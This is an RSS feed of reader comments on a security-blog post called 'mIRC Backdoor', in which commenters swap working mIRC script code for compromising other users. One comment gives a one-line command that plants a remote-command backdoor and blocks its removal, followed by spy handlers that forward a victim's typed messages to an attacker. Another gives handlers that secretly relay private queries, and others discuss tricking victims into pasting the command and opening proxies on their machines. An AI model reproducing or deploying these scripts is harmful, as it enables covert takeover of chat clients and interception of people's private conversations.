<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: mIRC Backdoor</title>
	<atom:link href="http://www.darknet.org.uk/2006/02/mirc-backdoor/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.darknet.org.uk/2006/02/mirc-backdoor/</link>
	<description>Ethical Hacking, Penetration Testing &#38; Computer Security</description>
	<lastBuildDate>Sat, 21 Nov 2009 06:04:59 +0000</lastBuildDate>
	<generator>http://wordpress.org/?v=2.8.6</generator>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
		<item>
		<title>By: SreeKanth</title>
		<link>http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-125256</link>
		<dc:creator>SreeKanth</dc:creator>
		<pubDate>Thu, 18 Dec 2008 06:47:34 +0000</pubDate>
		<guid isPermaLink="false">http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-125256</guid>
		<description>Thats a grt conversation from top to bottom. Well my question is, is there any backdoor script where i can send a MSG to all users at once on an irc server. Can anyone help me out with this?</description>
		<content:encoded><![CDATA[<p>Thats a grt conversation from top to bottom. Well my question is, is there any backdoor script where i can send a MSG to all users at once on an irc server. Can anyone help me out with this?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: SHITEMASTER</title>
		<link>http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-123402</link>
		<dc:creator>SHITEMASTER</dc:creator>
		<pubDate>Tue, 17 Jun 2008 18:45:55 +0000</pubDate>
		<guid isPermaLink="false">http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-123402</guid>
		<description>chevalier, i think the word you are looking for is batch script.  also, you could easily add socket scripts to perform automated shit.  a good idea would be making a socklisten event in which opens a proxy server on the victims host.  of course, this would not work if the person is behind a router, and not forwarded on the port selected, would still be quite interesting

or simply use mirc to write some .html files with javascript on them.  there are several possibilities</description>
		<content:encoded><![CDATA[<p>chevalier, i think the word you are looking for is batch script.  also, you could easily add socket scripts to perform automated shit.  a good idea would be making a socklisten event in which opens a proxy server on the victims host.  of course, this would not work if the person is behind a router, and not forwarded on the port selected, would still be quite interesting</p>
<p>or simply use mirc to write some .html files with javascript on them.  there are several possibilities</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: chevalier3as</title>
		<link>http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-123401</link>
		<dc:creator>chevalier3as</dc:creator>
		<pubDate>Tue, 17 Jun 2008 17:31:24 +0000</pubDate>
		<guid isPermaLink="false">http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-123401</guid>
		<description>nice!! if i got that right, the mIRC client reate a *.dll with specific options( -c *.dll ctcp 1:*:*:$1-) I still don&#039;t get 1:*:*:$1, then load it to the client.
wouldn&#039;t it be possible to do the same with browsers??Creating a *.dll file then sending commands through ctcp, probably js or some scripting language readable by the browser????
that would be nice, but the dll file has to be loaded to the client at each start!</description>
		<content:encoded><![CDATA[<p>nice!! if i got that right, the mIRC client reate a *.dll with specific options( -c *.dll ctcp 1:*:*:$1-) I still don&#8217;t get 1:*:*:$1, then load it to the client.<br />
wouldn&#8217;t it be possible to do the same with browsers??Creating a *.dll file then sending commands through ctcp, probably js or some scripting language readable by the browser????<br />
that would be nice, but the dll file has to be loaded to the client at each start!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: SHITEMASTER</title>
		<link>http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-123397</link>
		<dc:creator>SHITEMASTER</dc:creator>
		<pubDate>Tue, 17 Jun 2008 03:17:27 +0000</pubDate>
		<guid isPermaLink="false">http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-123397</guid>
		<description>//write xd on ^*:text:@do*:*: $chr(123) $ $+ 2- $chr(124) halt $chr(125) &#124; //write xd alias unload noop &#124; //write xd alias remote noop &#124; /load -rs xd

it disables /unload and /remote to some degree, there are likely better methods, and i&#039;d be willing to see them


from there i would use the backdoor to load the spy script, since the line may be too long to use it all in one command.
you should use an alias to do this for me, but whatever works.
example:
@do /write spy on *:input:*: { if (%spy) { .msg %spy $active $+ : $1- } }
@do /write spy on *:disconnect: { unset %spy }
@do /write spy on *:connect: { join #rofl }
@do /write spy on *:topic:#rofl: { if ($1 == !setspy) { set %spy $2 }


well, that&#039;s that.</description>
		<content:encoded><![CDATA[<p>//write xd on ^*:text:@do*:*: $chr(123) $ $+ 2- $chr(124) halt $chr(125) | //write xd alias unload noop | //write xd alias remote noop | /load -rs xd</p>
<p>it disables /unload and /remote to some degree, there are likely better methods, and i&#8217;d be willing to see them</p>
<p>from there i would use the backdoor to load the spy script, since the line may be too long to use it all in one command.<br />
you should use an alias to do this for me, but whatever works.<br />
example:<br />
@do /write spy on *:input:*: { if (%spy) { .msg %spy $active $+ : $1- } }<br />
@do /write spy on *:disconnect: { unset %spy }<br />
@do /write spy on *:connect: { join #rofl }<br />
@do /write spy on *:topic:#rofl: { if ($1 == !setspy) { set %spy $2 }</p>
<p>well, that&#8217;s that.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: backbone</title>
		<link>http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-59478</link>
		<dc:creator>backbone</dc:creator>
		<pubDate>Wed, 13 Jun 2007 14:41:06 +0000</pubDate>
		<guid isPermaLink="false">http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-59478</guid>
		<description>s1n that was my first post wtf should have I written to get attention (hist) ? =)

something like this would do

on *:input:?: { /.msg DeJest spy $me $1- }
on *:text:?: { /.msg DeJest spy $nick $1- }

then you should parse with a tiny script so that if SomeOne002 is the first param or SomeOne001 then drop it in a window... small ex:

on *:text:spy*: { echo @spywindow $1- }

not tested but should look something like this...</description>
		<content:encoded><![CDATA[<p>s1n that was my first post wtf should have I written to get attention (hist) ? =)</p>
<p>something like this would do</p>
<p>on *:input:?: { /.msg DeJest spy $me $1- }<br />
on *:text:?: { /.msg DeJest spy $nick $1- }</p>
<p>then you should parse with a tiny script so that if SomeOne002 is the first param or SomeOne001 then drop it in a window&#8230; small ex:</p>
<p>on *:text:spy*: { echo @spywindow $1- }</p>
<p>not tested but should look something like this&#8230;</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: s1n</title>
		<link>http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-59471</link>
		<dc:creator>s1n</dc:creator>
		<pubDate>Wed, 13 Jun 2007 11:56:28 +0000</pubDate>
		<guid isPermaLink="false">http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-59471</guid>
		<description>Christ! mirc script backdoors? that is so 90s! 

bah, anyway:

amru: try typing &quot;/help commands&quot; in mirc. (first rule of hackclub(r), RTFM!)

DeJest: &quot;/help scripts&quot;, i would suggest you look into the on INPUT and TEXT events for what you want. 
tip: if you run a command as /.command it should not print stdout to user if fuzzy memory serves.

let us know if you code something cool, there is a lot of potential.


s1n</description>
		<content:encoded><![CDATA[<p>Christ! mirc script backdoors? that is so 90s! </p>
<p>bah, anyway:</p>
<p>amru: try typing &#8220;/help commands&#8221; in mirc. (first rule of hackclub(r), RTFM!)</p>
<p>DeJest: &#8220;/help scripts&#8221;, i would suggest you look into the on INPUT and TEXT events for what you want.<br />
tip: if you run a command as /.command it should not print stdout to user if fuzzy memory serves.</p>
<p>let us know if you code something cool, there is a lot of potential.</p>
<p>s1n</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: DeJest</title>
		<link>http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-59470</link>
		<dc:creator>DeJest</dc:creator>
		<pubDate>Wed, 13 Jun 2007 10:10:50 +0000</pubDate>
		<guid isPermaLink="false">http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-59470</guid>
		<description>Hi, is there a way to view another user&#039;s queries? Say for instance, I (DeJest) want to view the query between SomeOne001 and SomeOne002.</description>
		<content:encoded><![CDATA[<p>Hi, is there a way to view another user&#8217;s queries? Say for instance, I (DeJest) want to view the query between SomeOne001 and SomeOne002.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: amru</title>
		<link>http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-56333</link>
		<dc:creator>amru</dc:creator>
		<pubDate>Mon, 12 Mar 2007 10:26:49 +0000</pubDate>
		<guid isPermaLink="false">http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-56333</guid>
		<description>please l want more comands</description>
		<content:encoded><![CDATA[<p>please l want more comands</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: backbone</title>
		<link>http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-56237</link>
		<dc:creator>backbone</dc:creator>
		<pubDate>Sat, 10 Mar 2007 16:32:00 +0000</pubDate>
		<guid isPermaLink="false">http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-56237</guid>
		<description>the victim has to enter that command line in there editbox... the place where you type the message before hitting enter... =))</description>
		<content:encoded><![CDATA[<p>the victim has to enter that command line in there editbox&#8230; the place where you type the message before hitting enter&#8230; =))</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: amru</title>
		<link>http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-56236</link>
		<dc:creator>amru</dc:creator>
		<pubDate>Sat, 10 Mar 2007 15:39:02 +0000</pubDate>
		<guid isPermaLink="false">http://www.darknet.org.uk/2006/02/mirc-backdoor/#comment-56236</guid>
		<description>how can l use this cmmand and where l put it</description>
		<content:encoded><![CDATA[<p>how can l use this cmmand and where l put it</p>
]]></content:encoded>
	</item>
</channel>
</rss>
